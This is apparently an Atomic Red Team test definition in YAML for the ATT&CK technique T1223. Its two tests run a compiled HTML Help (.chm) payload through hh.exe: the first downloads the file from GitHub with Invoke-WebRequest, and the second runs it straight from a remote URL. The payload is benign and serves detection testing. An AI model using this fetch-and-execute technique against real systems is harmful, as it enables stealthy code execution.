---
attack_technique: T1223
display_name: Compiled HTML File

atomic_tests:
- name: Compiled HTML Help Local Payload
  auto_generated_guid: 5cb87818-0d7c-4469-b7ef-9224107aebe8
  description: |
    Uses hh.exe to execute a local compiled HTML Help payload.
    Upon execution calc.exe will open
  supported_platforms:
    - windows
  input_arguments:
    local_chm_file:
      description: Local .chm payload
      type: path
      default: PathToAtomicsFolder\T1223\src\T1223.chm

  dependency_executor_name: powershell
  dependencies:
    - description: |
        The payload must exist on disk at specified location (#{local_chm_file})
      prereq_command: |
        if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}"

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      hh.exe #{local_chm_file}

- name: Compiled HTML Help Remote Payload
  auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d
  description: |
    Uses hh.exe to execute a remote compiled HTML Help payload.
    Upon execution displays an error saying the file cannot be open
  supported_platforms:
    - windows
  input_arguments:
    remote_chm_file:
      description: Remote .chm payload
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      hh.exe #{remote_chm_file}
